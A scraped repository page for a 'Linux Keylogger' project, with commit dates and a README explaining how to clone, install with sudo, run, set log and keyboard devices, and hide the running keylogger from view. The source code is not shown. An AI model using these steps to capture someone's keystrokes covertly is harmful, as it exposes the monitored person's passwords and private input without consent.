1
0
mirror of https://github.com/dimkouv/Linux-Keylogger.git synced 2025-05-15 13:20:13 -07:00
Dimitrios Kouveris ac07f67532 Update install.sh
2016-11-26 23:54:52 -05:00
v2
2016-11-26 23:40:08 -05:00
2016-11-26 23:54:52 -05:00
2016-11-26 23:46:00 -05:00

Linux Keylogger

Instructions

  • Download
$ git clone https://github.com/dimkouv/Linux-Keylogger
  • Install
$ cd Linux-Keylogger
$ sudo ./install.sh
  • Run
$ sudo keylogger

  • Optional

Give custom log file

$ keylogger -o /path/to/my/logfile.txt

Change keyboard device

$ keylogger -k /dev/input/eventX

Find your keyboard device. It should be in the below format.

/dev/input/eventX

$ cat /var/log/Xorg.0.log | grep /dev/input | grep -i keyboard

- Open ```/usr/share/keylogger/.settings``` for manual settings. - To hide keylogger press Ctrl+Z and then close the terminal. Close it using ```sudo killall keylogger```.
Description
No description provided
Readme 300 KiB
Languages
C 75.6%
Shell 19.9%
Makefile 4.5%